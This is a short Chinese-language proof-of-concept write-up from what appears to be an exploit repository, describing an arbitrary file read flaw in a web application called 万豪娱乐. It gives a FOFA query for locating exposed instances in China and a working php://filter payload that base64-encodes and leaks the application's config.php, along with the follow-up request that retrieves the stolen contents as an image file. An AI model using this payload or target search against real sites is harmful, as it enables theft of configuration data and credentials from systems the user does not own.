POC/wpoc/万豪娱乐/万豪娱乐存在任意文件读取漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

22 lines
776 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 万豪娱乐存在任意文件读取漏洞
# 一、漏洞简介
万豪娱乐存在任意文件读取漏洞
# <font style="color:rgb(51, 51, 51);">二、资产测绘</font>
+ fofa`"Public/Js/Mobile" && country="CN"`
+ 特征
![1732603661176-cb3a2a28-7d6a-40d4-9d80-fd111ca79567.png](./img/eaMHkXnPwwFbw3wO/1732603661176-cb3a2a28-7d6a-40d4-9d80-fd111ca79567-382774.png)
# 三、漏洞复现
```plain
/Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993
```
<font style="color:rgb(52, 73, 94);">使用poc访问后接着访问 /public/gamelist/1993.jpg 的图片,保存下来就是读取到的内容</font>
> 更新: 2024-11-27 10:00:05
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ifd65o9r8hm8m0ac>